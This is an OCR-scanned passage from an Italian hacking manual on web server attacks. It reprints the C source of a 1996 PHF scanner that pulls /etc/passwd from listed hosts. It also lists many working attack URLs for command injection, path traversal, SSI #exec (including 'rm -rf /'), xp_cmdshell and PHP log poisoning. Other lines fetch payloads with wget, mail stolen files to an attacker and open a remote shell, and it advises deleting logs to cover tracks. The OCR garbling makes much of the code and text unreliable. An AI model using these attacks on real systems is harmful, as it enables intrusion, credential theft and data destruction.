Come abbiamo appena detto il file PHF server a gestire l'aggiornamento di un indirizzario di 
numeri telefonici. 

L'uso anomale del comando potrebbe in un sistema Unix portare a vedere il contenuto di un 
file come potrebbe essere quello degli utenti ovvero passwd. 



Il seguente scanner ricerca sistemi che possiedano il problema legato a PHF. 
/* 

phfscan . c 
June, 1996 
By Alhambra 

alhambra@infonexus . com 

A production of The Guild Corporation, 1996 

A quick hack to make scanning for hosts which stili nave the phf bug. 
Accepts hosts to scan front stdin, and writes whatever it gets back to 
stdout . Plenty of room for optimization, and features that could be 
added include forking off multiple copies for concurrent scans, etc, 

etc. 

Do it yourself . . .that 's how you learn. 

The effectiveness of this program for getting password files isn 't 
what it once was...we see only around a 30% success ratio at getting 
/etc/passwd from hosts that would have been vulnerable once upon a 

time . 

But that ' s stili something . . . 
Use: 

phfscan < infile > outfile 

*/ 

iinclude <sys/stat . h> 
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iinclude <sys/types .h> 
iinclude <term±os.h> 
iinclude <unistd. h> 
# include <stdio . h> 
iinclude <fcntl.h> 
iinclude <sys/syslog .h> 
iinclude <sys/param . h> 
iinclude <sys/times.h> 
iifdef LINUX 
iinclude <sys/time . h> 
iendif 

iinclude <unistd.h> 
iinclude <sys/socket . h> 
iinclude <netinet/in . h> 
iinclude <sys/signal . h> 
iinclude <arpa/inet . h> 
iinclude <netdb.h> 
int FLAG = 1; 
int Cali (int signo) 
{ 

FLAG = 0; 

} 

main (int argc, char *argv[]) 
{ 

char host[100], buffer [1024] , hosta [1024] , FileBuf [8097] ; 
int outsocket, serv_len, len,X, c, outfd; 
struct hostent *nametocheck; 
struct sockaddr_in serv_addr; 
struct in_addr outgoing; 

char PHFMessage []= "GET /cgi-bin/phf?Qalias=x%Oa/bin/cat %20/etc/passwd\n "; 
/* yp version. . .use as needed. . . */ 
/* char PHFMessage []=" GET /cgi- 

bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd\n "; */ 

while (fgets (hosta, 100, stdin) ) 
{ 

if (hosta [0] == '\0') 
break; 

hosta [strlen (hosta) -1] = ' \0 ' ; 
write (1, hosta, strlen (hosta) *sizeof (char) ) ; 
writefl, "\n" , sizeof (char) ) ; 

outsocket = socket (AF_INET, SOCK_STREAM, 0) ; 
memset (&serv_addr, 0, sizeof (serv_addr) ) ; 
serv_addr . sin_family = AF_INET; 

nametocheck = gethostbyname (hosta) ; 

/* Ugly stuff to get host name into inet_ntoa fonti */ 

(void *) memcpy (Soutgoing. s_addr, nametocheck->h_addr_list [0] , 

sizeof (outgoing. s_addr) ) ; 
strcpy (host, inet_ntoa (outgoing)); 
serv_addr . sin_addr . s_addr = inet_addr (host); 
serv_addr . sin _port = htons (80); 
signal (SIGALRM, Cali) ; 
FLAG = 1; 

alarm(lO) ; 

X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof 
( serv_addr) ) ; 

alarm(O) ; 

if (FLAG == 1 && X==0) ( 
write (outsocket, PHFMessage, strlen (PHFMessage) *sizeof (char) ) ; 
while ( (X=read (outsocket, FileBuf, 8096) ) !=0) 
write (1, FileBuf, X) ; 
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; 

dose (outsocket) ; 

} 

return 0; 

} 



test - cgi 

Un altro file che spesso viene dimenticato all'interno dei WEB Server è un CGI che serve a 
testare che le variabili d'ambiente ede altre informazioni vengano passate correttamente alle 
query. 

http: //thegnome . com/cgi -bin/test -cgi ? \ whatever 

La risposta potrebbe essere : 
CGI/1 . 0 test script report : 
argc is 0. argv is . 



SERVER_ SOFTWARE = NCSA/1 . 4B 
SERVER_NAME = thegnome . coiti 
GA TE WA Y_ INTERFACE = CGI/1.1 
SERVER_PROTOCOL = HTTP/1 . 0 
SERVER_PORT = 80 
REQUEST_METHOD = GET 

HTTP_ACCEPT = text/plain, application/x-html, application/html, 

text/html, text/x-html 
PATH_INFO = 
PA TH_ TRAN SLA TED = 
SCRIP T_NAME = / cgi-bin/test-cgi 
QUERY_STRING = whatever 
REMOTE_HOST = fifth . column . gov 
REMO TE_ADDR = 200 . 200 . 200 . 200 
REMO TE_ USER = 
AUTH_ TYPE = 
CONTENT_ TYPE = 



Luso del carattere Oa può essere utilizzato all'interno di questo comando per fargli eseguire 
altre cose. 

http : //thegnome . com/ cgi-bin/test-cgi ? \help&0a/bin/cat%20/etc/passwd 

I seguenti comandi possono listare i files dentro alla directory CGI-BIN. 

http : //thegnome . com/cgi-bin/test-cgi?* HTTP/1 . 0 

http : //thegnome . com/cgi-bin/test-cgi?x * 

http : //thegnome . com/cgi-bin/nph-test-cgi?* HTTP/1 . 0 



Il carattere ~ 

Il carattere ~ viene usato durante il processo di risoluzione di un URL dal server. 
Durante il settaggio del WEB l'amministratore può definire una UserDir del tipo /public_html/ 
in modo che il carattere ~ sostituisca tutto il nome della directory quando questa viene 
richiesta. 

Alcuni server Unix che non hanno una directory /pubi ic_html/ tentano di risolvere la home 

directory listata dentro a /etc/passwd. 

La seguente URL fornisce delle informazioni interessanti: 
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Se il server non è bloccato questa URL vi permette di accedere alla dircetory ROOT per cui 
diventa possibile accedere a qualsiasi file pubblico. 

http : //thegnome . com/~root/etc/passwd 

Server S ide I nclude 

Alcune volte i dati che vengono inseriti dentro a dei database tramite pagine WEB, come ad 
esempio quelli dei libri degli ospiti, possono creare dei problemi dovuti all'interpretazione dei 
valori stessi. 

In altre parole esiste un particolare statement che permette di includere del codice dentro a 
delle pagine e precisamente : 



Ora supponiamo di aver scritto dentro al libro degli ospiti il nostro nome. 
La successiva visualizzazione della pagina ci mostrerà questo. 
Se invece del nome avessimo scritto uno dei seguenti statement : 

<! — #exec cmd="rm -rf /" — > 

</ — #exec cmd= "mail me@my.org < cat /etc/passwd" — > 
</ — #exec cmd="chmod 777 ~ftp/incoming/uploaded_hack_script" — > 
< .' — #exec cmd= "~ftp/incoming/uploaded_hack_script " — > 



il sistema visualizzando la linea stessa la interpreterebbe eseguendo il comando interno. 

Problemi legati ai caratteri 

All'inizio del capitolo abbiamo parlato di problemi legati all'uso di caratteri strani. 

Il più comune tipo di attacco portato digitando caratteri strani è quello legato all'uso dei 

e 

Chiaramente il significato relativo ai percorsi potrebbe indurre alla creazione di qualche 
problema in particolar modo per quanto riguarda l'uso dentro a dei CGI. 
Ad esempio : 

http : //www . websitek . it/cgi-bin/prova . cgi?file= . ./. ./. . /etc/passwd 

Un altro carattere è la rappresentazione esadecimale delo spazio ovvero "%20". 
Ad esempio : 



http: //www. websitek . it/cgi-bin/test . cgi?page=ls%20-al 

Sempre relativo ai caratteri specificati come valori esadecimali è possibile usare la 
rappresentazione del carattere NULL. 

Un esempio potrebbe essere il seguente. 

In alcuni casi l'uso di comandi del tipo di quelli visti come : 

http : //www . websitek . it/cgi-bin/prova . cgi?file= . ./. ./. . /etc/passwd 

non sono permessi dai servers in quanto questi potrebbero testare la presenza di un 
estensione .HTML al termine del comando. 

Ilo seguente metodo di formulare il comando porterebbe il server ad essere ingannato. 
http: //www. websitek . it/cgi- 



II successivo carattere è quello definito di PIPE il quale generalmente viene utilizzato per 
eseguire più comandi specificando una sola linea di comando. 
Ad esempio : 
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# cat passwd / more 

oppure 



L'uso su una riga di comando indirizzata al WEB potrebbe essere : 

http : //www. websitek . It/cgi -bin/prova . cgi ?page= . . / . . / . . /bln/ls \ 

Una variazione del comando, che per altro avrebbe richiesto l'esecuzione del comando Is in 
ambiente Unix, potrebbe essere : 

http : //www . websitek . It /cgi -bin/prova . cgi?page= . ./. ./. . /bin/ls%20- 
al%20/etcl 



Il comando richiederebbe il listato della directory /etc 

Il carattere ";" permette di eseguire più comandi su una sola riga in ambiente Unix. 
Ad esempio : 



Un altro carattere che potrebbe indurre alla creazione di problemi con i WEB è il carattere 
apicetto ( ' ). 

Questo crea problemi in particolar modo quando la stringa che lo contiene è indirizzata ad un 
database in quanto questo possiede per i sistemi SQL un significato particolare. 
Facciamo un esempio : 

http://host/cgi-bin/lame.asp?nome='Flavio';EXEC master.dbo.xp_cmdshaircmd.exe dir' 

I caratteri / possono anche loro costituire un problema per i WEB ma se dati con NETCAT. 
Ricordiamoci che molti Browser il filtraggio di certi caratteri non lasciandoli passare per cui 
certi tipi di test devono essere condotti con programmi come NC che eseguono la scrittura in 
modalità RAW sulla porta del protocollo http. 
Un esempio potrebbe esser : 

m^\llyNWN\\os\.comllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllin 

Questa richiesta eseguirebbe la directory sul sistema di destinazione. 

Un altro exploit molto recente ancora utilizzabile su molti sistemi è il seguente : 

http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f% 
5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/SomeNonExistantPath 

Dove la richiesta esegue http://jscript.dk/test.js su YOUR.TLD il quale deve avere un 
installazione MS. 

I tipi di problemi che possono derivare dalla digitazione di caratteri strani possono essere di 
numero esagerato per cui sarebbe meglio tenere un database in modo tale che quando uno 
di questi bug viene a galla sarà sufficiente aggiungere a questo il tutto. 
Facendo in questo modo la successiva volta che si cerca di testare un sistema è possibile 
farlo automaticamente ripetendo la stessa procedura che magari è stata eseguita già un 
numero grosso di volte. 

Mi sembra inutile dire che in ogni caso esistono già programmi in circolazione che tra le altre 
funzioni che svolgono eseguono anche i test indirizzati ai WEB Servers. 
In altri capitoli avevamo visto RETINA. 

In questi software esiste il vantaggio che i database dei problemi vengono gestiti dalle case 
che hanno creato il pachetto. 

Sulla rete esistono alcuni programmi scritti in Perl adatti a testare tutti i problemi con i WEB. 
Uno di questi è : 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



— whisker / 


vi. 4.0 / rain forest puppy / www.wiretrip.net 





-n+ 


*nmap output (machine format, v2.06+) 




-h+ 


*scan single host (IP or domain) 




-H+ 


*host list to scan (file) 




-F+ 


* (for unix multi -threaded front end use only) 




-s+ 


specifies the script database file (defaults 


to scan . db) 


-V 


use virtual hosts when possible 




-p+ 


specify a different default port to use 




-S+ 


force server version (e.g. -S "Apache/1.3.6") 




-u+ 


user input; pass XXUser to script 




-i 


more info (exploit Information and such) 




— v 


verbose. Print more Information 




-d 


debug. Print extra crud++ (to STDERR) 




-W 


HTML/web output 




-1+ 


log to file instead of stdout 




-a+ 


authorization username [ -.password] 




-P+ 


password file for -L and —U 




-I 1 


IDS-evasive mode 1 (URL encoding) 




-I 2 


IDS-evasive mode 2 (/./ directory insertion) 




-I 3 


IDS-evasive mode 3 (premature URL ending) 




-I 4 


IDS-evasive mode 4 (long URL) 




-I 5 


IDS-evasive mode 5 (fake parameter) 




-I 6 


IDS-evasive mode 6 (TAB separation) (not NT/IIS) 


-I 7 


IDS-evasive mode 7 (case sensitivity) 




-I 8 


IDS-evasive mode 8 (Windows delimiter) 




-I 9 


IDS-evasive mode 9 (session splicing) (slow) 




-I 0 


IDS-evasive mode 0 (NULL method) 




-M 1 


use HEAD method (default) 




-M 2 


use GET method 




-M 3 


use GET method w/ byte-range 




-M 4 


use GET method w/ socket dose 




-A 1 


alternate db format: Voideye exp.dat 




-A 2 


alternate db format: cgichk* .r (in rebol) 




-A 3 


alternate db format: cgichk. c/messala. c (not 


cgiexp. c) 


— Utility options (changes whisker behavior) : 




-U 


brute force user names via directories 




-L+ 


brute force login name/password 






(parameter is URL; use with -a for username) 




+ requires parameter; * one must exist; 




(Note: proxy/bounce support has been removed until 


v2.0) 



Questo dispone di librerie esterne con I vari test e quindi è un programma espandibile: 



Un esempio di files con test per i server è : 



# 


1 1 version 1.4.0 


server (xerox) 




print - This seems 


to be a printer. 


exit 
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server (printer) 

print - This seems to be a printer . 
exit 

endserver 

server (cisco ios technologies) 

print - This seems to be a Cisco Catalyst switch. 
exit 

endserver 

server (cisco) 
exit 

endserver 

server (apache/1 .0.3) 

print - Apache 1.0.3 is used in Xerox printers 
print - (i.e. this could be just a printer) 
endserver 

server (agranat -emweb) 

print - Agranat ' s embedded webserver; http://www.agranat.com 
print - The authentication realm is sometimes the product name 
endserver 

e cosi via. 

Chiaramente certe possibilità di attacco sono offerte dai software che girano su certe 
macchine e altre volte dai linguaggi come ad esempio Java. 

Il discorso dei linguaggi potrebbe essere molto ampio in quanto se il problema risiede dentro 
ad una libreria questo potrebbe essere tramandato a tutti i programmi compilati e linkati a 
quella. 

Un caso molto famoso era stato, e i molti casi lo è ancora, quello relativo alla libreria 
standard del c in ambiente Unix LIBC. 

Una delle funzioni interne legate all'input era passibile di buffer overflow per cui tutti i 
programmi compilati con questa LIBC erano in possesso dello stesso bug, ereditato dalla 
libreria stessa. 

In altri casi i linguaggi possono permettere exploits legati ad esempio al controllo trasversale. 
Ne è l'esempio i Servlet JAVA con i quali un carattere NULL (Null-Byte \000 | %00) può 
servire, se usato all'interno di un input da parte dell'utente usato direttamente con funzioni del 
tipo di "File" e "RandomAccessFile" potrebbe servire ad aprire files in modo arbitrario. 
Ad esempio : 



Anche i caratteri "." e possono essere utilizzati nella composizione di URL da passare 
attrvarso il browser. 
Ad esempio : 



La stringa di prima viene utilizzata con il "Message Of The Day" per ricavare determinate 

informazioni legate all'acquisizione di certi privilegi. 

Il carattere '!' viene utilizzato contro i sistemi SSI(Server Side Include). 

Un esempio è : 

http://host1/something.php=<!%20--#include%20virtual="http://host2/fake-article.html"--> 

Questo è solo un esempio di quello che un attaccante può fare ovvero includere un file da 
host2 e fare in modo che questo sembri apparire da hostl . 
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Altri esempi per fare vedere come dei dati di fatto arrivano da un'altra destinazione sono : 

http://host/search/search.cgi?query=< img%20src=http://host2/fake-article.jpg> 
http://host/something.php?q=< img%20src=javascript:something-wicked-this-way-comes> 

Il carattere può essere anche mascherato in esadecimale. 
Questo può anche essere utilizzato per eseguire comandi : 



Il carattere permette anche l'inclusione di files nascosti : 
http://host/something.php=<!%20--#include%20virtual=".htpasswd"--> 
Un altro problema potrebbe sorgere dall'uso dei caratteri "<?" 



La stringa di prima potrebbe permettere l'esecuzione di comandi utilizzando i privilegi 
dell'utente usato per l'esecuzione del WEB Server. 
Anche il carattere '*' potrebbe essere utilizzato. 

http://host/index.asp?something=..\..\..\..\WINNT\system32\cmd.exe?/c+DIR+e:\WINNT\*.txt 
http://host/blah.pl?somethingelse=ls%20*.pl 

Molte volte in un WEB server gli utenti sono inseriti dentro a delle directory che sono 
precedute dal carattere ~. 

Questo può essere utilizzato per vedere la directory di un certo utente. 
http://host/~joe 

Come saprete il carattere ' possiede un significato all'interno degli statement SQL per cui 
potrebbe essere utilizzato per la creazione di particolari stringhe di URL come ad esempio : 

http://host/cgi-bin/lame.asp?name=john';EXEC master.dbo.xp_cmdsheircmd.exe dir c:'~ 

I caratteri "#,{}, A , e [] "possono anche loro essere utilizzati. 

http://host/dont.pl?ask=/bin/echo%20"#!^ 
/perl%20/tmp/back.pl%20-p1 099 

I caratteri "( e )" vengono usati per la creazione di sringhe con file PHP. 



Il carattere + lo vedremo nel capitolo in cui parleremo esplicitamente dell'UNICODE BUG in 
quanto viene utilizzato per la composizione delle stringhe. 



I comandi più conosciuti che potrebbero essere eseguiti sono : 
"/bin/ls" 

http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al| 
http://host/cgi-bin/bad.cgi?doh=ls%20-al; 

In ambiente Windows un comando è sicuramente : 

"cmd.exe" 
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http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:\ 
"/bin/id" 

http://host/cgi-bin/bad.cgi?doh=../../../../bin/id| 
http://host/cgi-bin/bad.cgi?doh=id; 

"/bin/rm" 

Si tratta del comando Unix per la rimozione di files. 
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*| 
"wget e tftp" 

Questi sono ache I comandi usati da virus come Nimbda. 

http://host/cgi-bin/bad.cgi?doh=.y.V.y.Vpath/to-wget/wget%20http://host2/Phantasmp.c| 
http ://host/cgi-bin/bad.cgi?doh=wget%20http://www. hwa-security.net/Phantasmp. c; 

"cat" 

E' l'equivalente del comando type sotto Unix. 

http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd| 
http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd; 

"echo" 

Il comando viene anche utilizzato abbinato con i caratteri di redirezione per la creazione di 
files. 

http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20'1c-#kiwis%20was%20here"%20>>%200day.txt| 
http://host/cgi-bin/bad.cgi?doh=echo%20"fc-#kiwis%20was%20here"%20»%200day.txt; 

"ps" 

Si tratta del comando PRINT STATUS di Unix che mostra lo stato dei processi. 
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux| 

"kill e killall" 

Serve a killare un processo o tutti I processi sotto Unix. 

http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200| 
http://host/cgi-bin/bad.cgi?doh=kill%20-9%200; 

"uname" 

Richiede il nome host. 

http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a| 
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"ce, gec, peri, python" 

Anche I linguaggi possono essere utilizzati all'interno delle stringhe di comando passate 
tramite URL. 

http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c| 
http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337; 



"mail" 

Questo è uno dei gestori email sotto Unix. 

http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@hostname%20«%20/etc/motd| 
http://host/cgi-bin/bad.cgi?doh=mail%20steele@jersey.whitehouse.gov%20«/tmp/wu- 
2.6.1. c; 

"xterm/altre X application" 

I comandi di questo tipo possono essere utilizzati per guadagnare una shell. 
http://host/cgi-bin/bad.cgi?doh=../../../../usr/X11R6/bin/xterm%20-display%201 92.1 68.22.1 1 



"chown, chmod, chgrp, chsh" 

Anche questi comandi possono avere un utilizzo. 

http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod%20777%20index.html| 
http://host/cgi-bin/bad.cgi?doh=chmod%20777%20index.html; 
http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/master.passwd| 
http://host/cgi-bin/bad.cgi?doh=chsh%20/bin/sh; 

http://host/cgi-bin/bad.cgi?doh=../../../../bin/chgrp%20nobody%20/etc/shadow| 



Fino a questo punto abbiamo visto i comandi eseguibili che possono essere lanciati 
sfruttando dei problemi esistenti con la compilazione di certe URL. 
In questo caso invece vediamo i files che potrebbero essere richiesti. 



Si tratta del file password di Unix, 
"/etc/shadow" 



Questo è invece il file che contiene le password crittografate sotto Unix, 
"/etc/inetd.conf" 



Si tratta del file di configurazione dei servizi inetd. 



Sono I files di autenticazione usati da WEB Server come Apache. 
"[drive-letter]:\winnt\repair\sam._ o [drive-letter]:winnt\repair\sam" 
Il file della password hashate di Windows. 

In altri casi le stringhe passate come URL possono servire a creare degli Overflow. 
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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 



Con NETCAT o con TELNET possono essere usate delle tecniche legate a degli header 

modificati. 

Esempio 1 : 

su-2.05# telnet localhost 80 
Trying 127 .0 .0 . 1 . . . 
Connected to localhost . 
Escape character is '*] ' . 
GET / HTTP/1 . 0 

Referer: <! — #virtual include=" some file . log" — > (Yes Referrer is 

spelt wrong) 



In questo caso l'attaccante inserisce un TAG SSI dentro ai campi "Referrer" e "User agent" 
Esempio 2: 

su-2.05# telnet localhost 80 
Trying 127 .0 .0 .1 . . . 
Connected to localhost . 
Escape character is ' A J ' . 
GET / HTTP/1 . 0 

Referer: < Javascript -that-is-evil-so-there ' s-no-need-for-examples> 



I caratteri possono essere anche specificati in formato esadecimale. 

II modo di specificarli è : 



Esempio: %xx 

(Example : 
(Example : 
(Example : 
(Examples 
(Example : 
(Examples 
(Example : 
(Example : 
(Example : 
(Examples 
(Example : 
(Example : 
(Example : 
(Example : 
command argument) 
%7d = } (Example: 
command argument) 
%28 = ( (Example: 
%29 = ) (Example: 
%5b = [ (Example: 
command argument) 
%5d = ] (Example: 
command argument) 
%5e = A (Example: 



%2e 






%3e 




> 


%3c 




< 


%2a 




* 


%2b 




+ 


%60 






%21 




i 


%7c 




1 


%3b 




r 


%7e 






%3f 




■> 


%5c 




\ 


%2f 




/ 


%7b 




l 



. . requests) 

Html/Javascript/SSI insertion . Mentioned in last paper) 

Html/Javascript/SSI insertion . Mentioned in last paper) 

Listed in chapter 2 of this paper) 

cmd.exe backdoor reguest. Also used as space) 

Command execution . Mentioned in last paper) 

SSI insertion . Mentioned in last paper) 

Command execution . Mentioned in last paper) 

Command execution . Mentioned in last paper) 

Listed in chapter2 of this paper) 

Php/Mentioned in last paper) 

Possible Encoded Windows Directory Transversai Attempt) 
Possible Encoded Unix Directory Transversai Attempt) 
Possible trojan/backdoor upload attempt, possible 

Possible trojan/backdoor upload attempt, possible 

Possible Cross Site Scripting attempt) 
Possible Cross Site Scripting attempt) 
Possible trojan/backdoor upload attempt, possible 

Possible trojan/backdoor upload attempt, possible 

Possible trojan/backdoor upload attempt, possible 



Esempio: 

http: //host/ script . ext ?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63% 
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Esiste un equivalenza come ad esempio : 

1. %2e%2e%2f%2e%2e%2f%2e%2e%2f = ../../../ 

2. %65%74%63 = etc 

3. %2f = / 

4. %70%61%73%73%77%64 = passwd 
Il metodo usato da UNICODE è invece : 
Es empi o : Ixx %xx 

http: //127 . 0. 0.1/scripts/. . %cO%af. . /w±nnt/system32/cmd. exe?+/c+dir+c : \ 

"%u" Encoded Requests 
Esempio: % uxxxx 
La richiesta : 

http://host/lame.asp?asp=a.txt 
potrebbe essere data come 



Guadagnare l'accesso a livello di ROOT con PHP 

Una delle maggiori vulnerabilità di Windows coinvolge il linguaggio PHP mediante il quale è 

possibile riuscire a vedere dei files che sono residenti al di fuori delle normali directory dei 

files HTML di un WEB. 

Il server deve avere PHP 4 e Apache 2.0. 

Supponiamo che apache sia installato nella directory : 



Mentre PHP nella directory : 
C: \PHP\PHP.EXE 

A questo punto dal browser digitiamo : 



Apache aggiunge questa linea al file access.log. 

E' possibile richiedere la visualizzazione di questo file di log mediante : 



Il modo di guadagnare l'accesso di root è eseguito chiedendo al webserver di eseguire un 
"reverse telnet" verso il vostro server eseguendo netcat nel seguente modo: 

"ne -1 -n -v -p 

Vediamo come uplodare un file mediante l'exploit. 

Creiamo un file di testo con alcune linee dentro chiamato mytesfile.txt 

Controlliamo quanti bytes è il file di dimensioni 

Testaimo che il file sia accessibile tramite il nostro webserver mediante 

http : //nostroweb/mytestfile . txt 
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Cerchiamo il file sul server digitando : 
http : //www. example . com/myi 



Eseguiamo questa richiesta 4 volte anche se il server non sembrerà darci nulla. 
Fate attenzione a non premere REFRESH se no il metodo non funziona. 
Battiamo al richiesta sulla linea di comando del nostro browser. 

http : //www. example . com/<?$fp=fopen ( "http : //nostroweb/mytestfile . txt ", " rb ") ; ?> 

Ora attendiamo 10 secondi e digitiamo nuovamente : 



Attendiamo nuovamente 10 secondi e battiamo : 

http : //www. example . com/<?$fq=fopen ( "c : /Apache2/htdocs/mytestfile . txt ", "wb ") ; ?> 

Aspettiamo ancora 10 secondi e poi : 

Altri 10 secondi e poi richiediamo un file che non esiste: 

http : //www . example . com/nonexistant file . htm 

I soliti 10 secondi e poi rchiediamo a PHP di parserizzare il file di LOG di Apache. 

http : //www . example . com/php/php . exe ?c : \apache2\logs\access . log 

Ora premiamo il refresh per essere sicuri che il file sia perserizzato. 
A questo punto controlliamo se il file è presente sul sito con : 



Chiaramente questo file è un semplice file di testo ma potrebbe essere un qualsiasi file 
compreso un trojan. 

Avendo la possibilità di uplodare su di un sito un file con estensione .gif, .mp3 (nel nostro 
caso huf.gif) o altro contenente : 

# 

<? 

phpinfo () ; 

?> 

# 



Un attaccante potrà eseguire l'interprete PHP con : 



Sempre in relazione a PHP è possibile sapere la struttura relativa all'installazione del EB 
SERVER. 

Quando un amministratore installa Apache con PHP e aggiunge index. php al file di 
configurazione di Apache, questo prima guarda questo file nell'istante in cui invia indietro la 
pagina web di default per quella directory. 

Inviando una richiesta OPTIONS al WEB Server questo rivela la struttura delle directory di 

PHP. 

Inviando : 
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OPTIONS 


/ 


HTTP/1 . 1 


Host : 




192.168.1.2 


Accept : 




* /* 



Riceverete 



http/1 . l 

Date: Sun, 

Server : 

Vary: 

Accept -Ranges : 
Content-Length : 
Connection : 
Content -Type : 



500 Internai 

03 Feb 2002 

Apache/2. 0.28 



text/html; 



Server Error 
10:56:53 GMT 
(Win32) 
accept -language 
bytes 
680 
dose 

charset=ISO-8859-l 



<!DOCTYPE HTML PUBLIC " —//W3C//DTD HTML 4.0 Transitional//EN"> 

<HTML> 

<HEAD> 



<TITLE>Server 


error ! </TITLE> 


<LINK REV= "made " 


HREF= "mailto : admin@l 92.168.1.2"> 


</HEAD> 


<BOD Y BGCOLOR= " #FFFFFF " 


TEXT= "#000000 " LINK= "#OOOOCC "> 


<Hl>Server 


error !</Hl> 


<DL> 




<DD> 




handler "cgi-script" 


not found for : C : /php/php . exe 


</DL><DL><DD> 


If you think this is 


a server error, please contact 


the <A HREF 


= "mailto : admin@l 92.168.1.2 ">Webmaster</A> 


</DL> 


<H2>Error 


500</H2> 


<DL> 




<DD> 




<ADDRESS> 




<A 


HREF= "/ ">1 92.168.1. 2</A> 


<BR> 


<small>02/03/02 


10:56:53</small> 


<BR> 


<small>Apache/2 .0.28 


(Win32) </small> 



</ADDRESS> 
</DL> 
</BODY> 
</HTML> 



Chiaramente fino ad adesso abbiamo parlato di qualche cosa che di fatto non può essere 
definita una regola che può essere applicata a qualsiasi WEB. 

D'altra parte il discorso dei WEB segue esattamente quello generale dell'hacker ovvero quello 

che spinge a cercare i punti deboli di un sistema con tutti gli strumenti a disposizione. 

Tra i vari tools che possono essere utilizzati per testare la presenza di determinati problemi 

dentro ad un sito specifico c'è WEBCHK il quale dispone di diverse scelte orientate 

all'esecuzione di test nei confronti di CGI. 

Il programma è prelevabile da : 

http://www.illeqalcrew.org 

Il software dispone di possibilità di parametrizzazione anche se di fatto i test devono essere 
fatti individualmente. 

Nella finestra superiore viene visualizzata la risposta del WEB sottoposto all'invio della stringa 
di prova anche se la dialog visualizza già un messaggio in cui viene detto se il web è di fatto 
soggetto a quel problema o meno. 

L'immagine che segue mostra la dialog di lavoro di WEBCHK. 
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FrontPage 

Molti exploit collegati a FrontPage hanno come scopo quello di permettere l'accesso alla 
directory wwwroot directory e quindi possono essere usati per cambiare la pagina principale 
di un sito. 

La seguente lista mostra la struttura di alcuni files di MS relativamente ad un ipotetico disco C: 



C: \InetPub\ wwwroot 




<Home> 


C: \InetPub\ script s 




/Scripts 


C: \InetPub\ wwwroot \_vti_bin 




/_vti_bin 


C: \InetPub\ wwwroot \_vti_bin \_vti_adm 




/_vti_bin/_vti_adm 


C: \InetPub\ wwwroot \_vtl_bln \_vti_aut 




/_vti_bin/_vti_aut 


C: \InetPub\cgl-bln 




/cgi-bin 


C: \InetPub\wwwroot\srchadm 




/srchadm 


C : \ WINNT \ System32 \lnet serv \ii sadmln 




/iisadmin 


C: \InetPub\ wwwroot \_vtl_pvt 






C : \ InetPub \ wwwroot \ samples \ Search \ QVERYHIT . HTM 


Internet Information Index 


Server s ampie 






C:\Program F±les\M±crosoft FrontPage\_ 


_vti_b±n 




C:\Program F±les\M±crosoft FrontPage\_ 


_vti_b±n \_ 


vti_aut 


C:\Program F±les\M±crosoft FrontPage\_ 


_vti_b±n \_ 


vti_adm 



Utilizzando FRONTPAGE un hacker potrebbe alterare I files HTML di un sito remoto in 

quanto spesso i WEB FrontPage sono lasciati senza password. 

Nel menu file dell'explorer di FrontPage selezionate Open FrontPage Web. 

Nella dialogbox selezionate Open an Existing FrontPage Web e quindi scegliete anche il web 

interessato. 

Clickate 'More Webs' se il web desiderato non è listato. 
Clickate OK. 

Se vi viene richiesto il nome dell'autore e della password allora dovrete decriptare 
service.pwd. 

Lo scanning della PORTA 80 (http) o 443 (https) possono indicare: 

GET /__vti_inf.html ^Assicurare che le estensioni di FrontPage sono 

installate . 

GET /_vti_pvt/service .pwd iContiene le password codificate (Non usato in US) 
GET /_vti_pvt/authors .pwd #Sui servers Netscape. Nomi e password criptate 
GET /_vti_pvt/administrators .pwd 

GET /_vti_log/author . log #Se author.log esiste allora dovrete cancellarlo per 

coprire le tracce 

GET /samples/search/queryhit . htm 

L'utilizzo di alcuni motori di ricerca potrebbe portarci ad individuare la presenza di 
service.pwd. 

Per fare questo è sufficiente digitare il nome del file nel campo delle voci da ricercare. 
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Un tentativo che è possibile fare è indirizzato a vedere se mediante il servizio FTP è possibile 
scaricare il file. 



Email S poof ing 

Come abhbiamo detto prima alcuni tipi di problemi dipendono dai linguaggi utilizzati sui WEB 
server come ad esempio ASP. 

Ne è un esempio l'email spoofing legato all'uso delle funzioni ASP per l'invio di messaggi 
Email, tramite CDONTS.NEWMAIL 

Infatti moltissime installazioni MS utilizzano questo oggetto per l'addempimento di funzionalità 
d'invio di messaggi. 

Questo oggetto può essere utilizzato da un attaccante per inviare messaggi in modo arbitrario 
tramite WEB server. 

ASP utilizza T'oggetto CDONTS.NEWMAIL. nel seguente modo : 

<% 

set objNewMail = CreateObject("CDONTS.Newmail") 
